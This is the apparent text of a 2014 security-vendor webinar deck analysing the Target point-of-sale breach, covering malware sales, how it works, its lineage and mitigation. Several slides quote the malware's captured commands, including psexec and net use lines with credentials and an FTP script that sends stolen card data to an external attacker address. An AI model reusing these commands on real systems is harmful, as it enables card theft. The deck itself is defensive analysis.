> www.alertlogic.com

The Target Data Breach: Anatomy of an Attack

Stephen CotyDirector, Threat Research

Diane GareyProduct Marketing

February 4, 2014

> www.alertlogic.com 2

Today

Agenda• What’s in the News• About POS Malware• How the Malware Works• How to Protect Yourself

Logistics• Ask a question anytime

using the “Question Box” • Look for slides on the

Alert Logic SlideShare account

• You’ll get an email with a link to today’s recording

• Live Tweet today’s event

#AlertLogic_ACID

> www.alertlogic.com 3

30 Days of the Target Breach

Dec 18th Jan 10th Jan 15th Jan 17th

> www.alertlogic.com 4

You Never Want to Send This Communication

> www.alertlogic.com 5

What’s Being Reported

About the Attack• Malicious software infects

POS systems and sends credit card data via FTP

• Possibly home grown POS system running Windows OS

• Malware traced to Russia & sold to 60 European cyber criminals

About the Impact• 110 million customers

affected• Data being sold on the

underground market• Eight other retailers have

been compromised• Arrests being made on

people using the cards

> www.alertlogic.com 6

• Went into testing Feb 12, 2013 under the title:– “Dump CC memory grabber (pos-trojan)”

• Underground community laughed at the outrageous price• Currently not being sold due to Ree[4] selling out buyers

Malware for Sale

• Implemented by sending protakolu FTP

• Log is not encrypted• 1st updated edition

free• Rebuild product 200 $

(max 3)• No support• $1800

Budget Version

• Implemented by sending protakolu FTP

• Log encrypted invented us cipher

• Free updates for 3 months. Rebuild 100 $ (max 5)

• Support• $2000

Economy Version

• Shipping through the gate

• Log encrypted cipher invented by us

• Free updates for life. • Rebuild further by $

100• $2300

FullVersion

> www.alertlogic.com 7

More Malware Sales Details

• License agreement (translated from Russian)– “You use the program on your own risk and creators assume

no responsibility for your further use of this software. When buying, you automatically accept rules. Transfer programs and reselling third parties is prohibited and threatened deprivation of licenses and just what is included in your version.”

• Seller Information– E-mail 1: ree4@list.ru– E-mail 2: ree4@yandex.ru– ICQ: 565033– Skype: s.r.a.ree4

> www.alertlogic.com 8

Stolen Credit Cards are Selling for $15-60

Recent dumps: ~$15-60 range

Initial dumps: ~$12 average

> www.alertlogic.com

How the Malware (Kaptoxa-Rescator) Works

9

Saves data

• To a default .dll file

Establishes share

• net.exe/net1.exe creates Windows share

Stores and forwards data

• To internal server as a txt file that sends data to an external FTP server controlled by attackers

Disables firewall

• Creates an autorun entry to launch at boot

Infects POS System

• dum.exe exectutes mmom.exe

Scrapes memory

• Scrapes tracks 1 &2 from credit card data

Normal POS Activity: Pre-Infection

Post-Infection Activity: Step 1

New Service

Post-Infection Activity: Step 1.1

Looks like a regular user

Starts POSWDS

Post-Infection Activity: Step 1.2

Filtering for commands:  <---- cmd that was issued and captured in malware analysiscmd.exe /c moveC:\WINDOWS\system32\net.EXEnet start POSWDSC:\WINDOWS\system32\cmd.exe /c net use S: \\10.116.240.31\c$\WINDOWS\twain_32a.dll /user:ttcopscli3acs\Best1_user BackupU$

net.exe: establishes

Windows share

Post-Infection Activity: Step 2

BackDoor-FBPL takes the following actions:Step 1C:\WINDOWS\system32\cmd.exe /c psexec /accepteula \\10.116.240.31 -u ttcopscli3acs\Best1_user -p BackupU$r cmd /c "taskkill /IM bladelogic.exe /F”Step 2c:\windows\system32\cmd.exe /c psexec /accepteula \10.116.240.3 -u ttcopscli3acs\Best1_user -p BackupU$r cmd -d bladelogic

BackDoor-FBPL sleeps until the predetermined time of 10:00am and 5:00pm then runs:Step 1C:\WINDOWS\system32\cmd.exe /c move \\10.116.240.31\NT\twain_32a.dll C:\data_2014_1_20_17_53.txt  <-- Name created by date and time from system

> www.alertlogic.com 15

BMC Whitepaper

Post-Infection Activity: Step 2 continued

Step 2: Write data to a text file (cmd.txt)open 199.188.204.182 digitalw Crysis1089 cd etc cd bin send C:\data_2014_1_20_17_53.txt quit

Step 3 Command Linec:\windows\system32\cmd.exe /c ftp -s:c:\program files\xxxxx\xxxxx\temp\cmd.txt> c:\xxxxx\xxxxx\temp\cmd.txt

> www.alertlogic.com 17

Theory: How the Malware was Delivered

Ariba Vendor Portal

> www.alertlogic.com 18

Theory: How the Malware was Delivered

Login to Portal

> www.alertlogic.com 19

Theory: How the Malware was Injected

NCR POS Terminals

> www.alertlogic.com 20

Evolution of Target POS Malware

Memory Dumper

Copy a specific process in memory

DexterPOS

Steals the process list from an

infected machine while parsing

memory dumps

VSkimmer

Detect card readers, grab

information, send data to a control

server

AlinaPOS

v1 Createdv2 Encryption, v2.1 Logging

v3.2 & 5.2 Exfiltration

BlackPOS / Kaptoxa / Rescator

2008 2010 2012 2013

> www.alertlogic.com 21

Kaptoxa & Others Originated from Dexter

• Dexter:– Able to read process memory from infected machines– Parses memory dumps looking for track 1 & 2 of the

credit card data

• Infected POS systems in 40 countries– 42% of the systems

infected were in NA– 19% in the UK

• Targeted Windows OS

> www.alertlogic.com 22

How to Mitigate Risk

• Scan POS systems with your choice of antivirus • Check for the removal of autorun keys

• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run with the value "svchit”

• Check for removal of three executables• %USERPROFILE%/svchst.exe• Dum.exe• Mmon.exe

• Disable external FTP access outbound from the POS system on the network vs the host itself

• Create a whitelist of acceptable external addresses using IP filtering rules or Access Control Lists (ACL)

Contact us for a copy of our

Malware Analysis Report

> www.alertlogic.com 23

Credits to the Sources of Data

• http://www.alertlogic.com/data-breach-at-target-exposes-40-million-credit-cards/

• http://www.seculert.com/blog/2012/12/dexter-draining-blood-out-of-point-of-sales.html

• http://krebsonsecurity.com/2014/01/a-first-look-at-the-target-intrusion-malware/

• http://www.cyphort.com/blog/cyphort-tracks-down-new-variants-of-target-malware/

• http://www.tripwire.com/state-of-security/vulnerability-management/targets-point-sale-system-compromised/

> www.alertlogic.com 24

Join Tomorrow’s WebinarDelivering Real Protection: Alert Logic Security-as-a-Service

• http://alrt.co/ThreatLogDemo

• Full managedintrusion detectionand log management

• Deploy anywhereyour datacenter islocated

> www.alertlogic.com

Thank you!

To Follow our Research:

#AlertLogic_ACIDhttp://www.alertlogic.com/resources/blog/

info@alertlogic.com -> “Malware Analysis Report”